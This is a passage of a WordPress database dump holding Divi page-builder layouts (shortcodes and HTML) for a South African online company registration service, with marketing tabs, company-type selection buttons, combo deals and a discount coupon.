header_3_letter_spacing__hover=\"0px\" header_3_letter_spacing__hover_enabled=\"0px\" header_3_line_height__hover=\"1em\" header_3_line_height__hover_enabled=\"1em\" header_3_text_shadow_style__hover=\"none\" header_3_text_shadow_style__hover_enabled=\"none\" header_3_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" header_3_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\" header_2_font_size__hover=\"26px\" header_2_font_size__hover_enabled=\"26px\" header_2_letter_spacing__hover=\"0px\" header_2_letter_spacing__hover_enabled=\"0px\" header_2_line_height__hover=\"1em\" header_2_line_height__hover_enabled=\"1em\" header_2_text_shadow_style__hover=\"none\" header_2_text_shadow_style__hover_enabled=\"none\" header_2_text_shadow_color__hover=\"rgba(0,0,0,0.4)\" header_2_text_shadow_color__hover_enabled=\"rgba(0,0,0,0.4)\"]<h2>Join Today</h2>[/et_pb_text][et_pb_text _builder_version=\"3.17.6\" text_font=\"||||||||\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" text_line_height=\"2em\" text_orientation=\"center\" background_layout=\"dark\" max_width=\"60%\" max_width_last_edited=\"on|tablet\" module_alignment=\"center\" custom_margin=\"||60px\" custom_margin_tablet=\"||30px\" custom_margin_last_edited=\"on|desktop\"]<p>Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Cras ultricies ligula sed dictum porta. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Curabitur non nulla sit amet nisl tempus convallis quis ac lectus. Curabitur arcu erat, accumsan id imperdiet et</p>[/et_pb_text][et_pb_button button_text=\"Buy Divi  Pro For Just $89\" button_alignment=\"center\" _builder_version=\"3.17.6\" custom_button=\"on\" button_text_size=\"16px\" button_text_color=\"#ffffff\" button_bg_color=\"#091c4f\" button_border_color=\"rgba(0,0,0,0)\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Poppins|600|||||||\" button_use_icon=\"off\" box_shadow_style=\"preset1\" box_shadow_vertical=\"20px\" box_shadow_blur=\"71px\" box_shadow_spread=\"-14px\" box_shadow_color=\"#091c4f\" custom_padding=\"16px|32px|16px|32px|true|true\" button_letter_spacing_hover=\"2px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','Home Revamp 1','','publish','closed','closed','','home-revamp-1','','','2018-12-10 10:52:47','2018-12-10 08:52:47','',0,'https://companyregistration.online/?page_id=29342',0,'page','',0),(29377,3,'2018-12-10 09:15:18','2018-12-10 07:15:18','[et_pb_row make_fullwidth=\"on\" custom_padding=\"10px|0px|0px|0px\" custom_margin=\"|||\" background_position_1=\"top_left\" background_position_2=\"top_left\" background_repeat_1=\"no-repeat\" background_repeat_2=\"no-repeat\" admin_label=\"Flags\" _builder_version=\"3.2.1\" locked=\"off\" template_type=\"row\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" _builder_version=\"3.0.89\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\" background_position=\"top_left\" background_repeat=\"no-repeat\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2017/07/Sa-Flag-optimised.png\" align=\"right\" disabled_on=\"on|on|off\" _builder_version=\"3.2.1\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row]','double flaggs','','publish','closed','closed','','double-flaggs','','','2018-12-10 09:15:18','2018-12-10 07:15:18','',0,'https://companyregistration.online/et_pb_layout/double-flaggs/',0,'et_pb_layout','',0),(29378,3,'2018-12-10 09:15:41','2018-12-10 07:15:41','[et_pb_row make_fullwidth=\"on\" custom_padding=\"0px|0px|0px|0px\" _builder_version=\"3.0.58\" template_type=\"row\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.3.1\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" tab_font=\"Abel||||\" tab_font_size=\"17px\" body_font=\"||||\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.2.2\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.3.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row]','top tabs','','publish','closed','closed','','top-tabs','','','2018-12-10 09:15:41','2018-12-10 07:15:41','',0,'https://companyregistration.online/et_pb_layout/top-tabs/',0,'et_pb_layout','',0),(29379,3,'2018-12-10 09:16:12','2018-12-10 07:16:12','[et_pb_section fb_built=\"1\" admin_label=\"Call to Action\" _builder_version=\"3.0.85\" box_shadow_style=\"preset2\" custom_padding=\"3px|0px|43px|0px|false|false\" template_type=\"section\"][et_pb_row custom_padding=\"29px|0px|0px|0px\" _builder_version=\"3.0.53\"][et_pb_column type=\"4_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong>Select the company you require below or refer to menu above</strong></span><span style=\"font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\"><br /> </span></strong></span></h1>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>\r\n<p><span style=\"font-weight: normal; color: #0c71c3; font-size: xx-large;\"><strong></strong></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"2\" custom_padding=\"0|15px|0px|14px|false|false\" custom_margin=\"|||\" make_equal=\"on\" _builder_version=\"3.2.1\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Owner Managed\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Multiple Shareholders\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"600ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  2 or more shareholders directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Professional company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"800ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p class=\"\"><strong>Business Professionals  such as </strong><strong>Accountants, Lawyers and Doctors practising in a company</strong><span style=\"color: #ffffff;\"><strong>a</strong></span></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_cta title=\"Shareholder Role\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.16\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px||5px\" animation_style=\"flip\" animation_delay=\"1000ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][et_pb_button button_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" button_text=\"Start here\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_size=\"16px\" button_border_width=\"0px\" button_font=\"|on|||\" background_layout=\"dark\" button_text_color_hover=\"#0c71c3\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#0c71c3\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section]','company choices','','publish','closed','closed','','company-choices','','','2018-12-10 09:16:12','2018-12-10 07:16:12','',0,'https://companyregistration.online/et_pb_layout/company-choices/',0,'et_pb_layout','',0),(29380,3,'2018-12-10 09:16:38','2018-12-10 07:16:38','[et_pb_section fb_built=\"1\" _builder_version=\"3.0.58\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.12)\" background_color_gradient_type=\"radial\" background_color_gradient_start_position=\"75%\" custom_padding=\"7px|0px|6px|0px\" template_type=\"section\"][et_pb_row custom_padding=\"28px|0px|4px|0px\" _builder_version=\"3.0.53\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text _builder_version=\"3.0.89\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Other Registration Categories</span></strong></span></h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text disabled_on=\"on|on|off\" _builder_version=\"3.3.1\" header_font=\"||||||||\" header_text_color=\"rgba(0,86,237,0.78)\" header_font_size=\"36px\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px||true\" animation_style=\"fade\" animation_delay=\"600ms\" animation_starting_opacity=\"9%\" inline_fonts=\"Abel\"]<h1 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; font-size: xx-large;\"><strong><span style=\"color: #0c71c3;\">Combo Deals<br /></span></strong></span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row make_fullwidth=\"on\" _builder_version=\"3.0.89\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/product-category/tax-registration/\" use_icon=\"on\" font_icon=\"%%155%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Tax Registration\" _builder_version=\"3.0.87\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/product-category/tax-registration/\">Tax Registration</a></h4>\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_text admin_label=\"combo deals\" _builder_version=\"3.2.1\" custom_padding=\"25px||80px|\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1200ms\" animation_delay=\"450ms\" inline_fonts=\"Abel\"]<h2 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal; color: #c10097;\"><strong><a href=\"https://companyregistration.online/combo-services/\">Save by getting a combo of services here</a><br />\r\n</strong></span><a href=\"https://companyregistration.online/combo-services/\" rel=\"https://companyregistration.online/pricing-table/\"><img class=\"alignright wp-image-28359\" src=\"https://companyregistration.online/wp-content/uploads/2016/03/advance1600-300x300.png\" alt=\"\" width=\"103\" height=\"103\" /></a></h2>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb url=\"https://companyregistration.online/combo-services/\" use_icon=\"on\" font_icon=\"%%151%%\" use_icon_font_size=\"on\" icon_font_size=\"56px\" admin_label=\"Combo Savings\" _builder_version=\"3.0.89\" header_font=\"Abel|on||on|\" border_radii=\"on|10px|10px|10px|10px\" custom_padding=\"25px|10px|10px|10px\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"750ms\" custom_css_main_element=\"box-shadow: 0px 0px 30px #bfb7b6;\"]<h4 style=\"text-align: center;\"><a href=\"https://companyregistration.online/combo-services/\">Combo Savings</a></h4>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section]','combo services','','publish','closed','closed','','combo-services','','','2018-12-10 09:16:38','2018-12-10 07:16:38','',0,'https://companyregistration.online/et_pb_layout/combo-services/',0,'et_pb_layout','',0),(29381,3,'2018-12-10 09:17:23','2018-12-10 07:17:23','[et_pb_row make_fullwidth=\"on\" custom_padding=\"20px|20px||20px\" custom_margin=\"||20px|\" _builder_version=\"3.2.1\" background_color=\"#ffffff\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"3px\" border_color_all=\"#ffffff\" border_style_all=\"none\" box_shadow_style=\"preset3\" template_type=\"row\"][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_shop type=\"best_selling\" posts_number=\"9\" columns_number=\"3\" orderby=\"popularity\" sale_badge_color=\"rgba(255,35,83,0.69)\" icon_hover_color=\"#2fa318\" hover_overlay_color=\"rgba(124,218,36,0.23)\" hover_icon=\"%%45%%\" admin_label=\"Featured page\" _builder_version=\"3.2.1\" title_font=\"|700|||||||\" title_font_size=\"18px\" title_line_height=\"1.1em\" price_font=\"Open Sans|600|on||||||\" price_text_color=\"#0c71c3\" price_font_size=\"18px\" price_text_shadow_style=\"preset4\" custom_padding=\"20px|||10px\"][/et_pb_shop][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.0.47\" parallax=\"off\" parallax_method=\"on\"][et_pb_blurb title=\"Save\" url=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" url_new_window=\"on\" use_icon=\"on\" font_icon=\"%%155%%\" icon_color=\"#0c71c3\" use_circle=\"on\" content_max_width=\"471px\" use_icon_font_size=\"on\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset1\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.25)\" background_color_gradient_direction=\"297deg\" background_color_gradient_start_position=\"62%\" box_shadow_style=\"preset1\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"50px||50px||true\" custom_padding=\"40px|30px|40px|30px|true|true\" animation_style=\"roll\" animation_duration=\"1050ms\" animation_delay=\"50ms\"]<p><span style=\"color: #000000;\">Get a</span> <strong><span style=\"color: #800080;\">25%</span></strong> <span style=\"color: #000000;\">discount on your first purchase</span> <strong><span style=\"color: #800080;\"></span></strong></p>\r\n<p><span style=\"color: #000000;\">Use the coupon code</span> <strong><span style=\"color: #800080;\">customise</span></strong> <span style=\"color: #000000;\">on the checkout page</span></p>[/et_pb_blurb][et_pb_blurb title=\"Money Back Guarantee\" image=\"https://companyregistration.online/wp-content/uploads/2018/05/MOneyBack.png\" content_max_width=\"471px\" disabled_on=\"on|off|off\" _builder_version=\"3.2.2\" header_font=\"|700|||||||\" header_text_color=\"#c40079\" header_font_size=\"52px\" header_text_shadow_style=\"preset2\" body_font=\"||||||||\" body_font_size=\"20px\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.27)\" background_color_gradient_direction=\"151deg\" background_color_gradient_start_position=\"74%\" box_shadow_style=\"preset2\" text_orientation=\"center\" max_width=\"67%\" module_alignment=\"center\" custom_margin=\"47px||47px||true\" 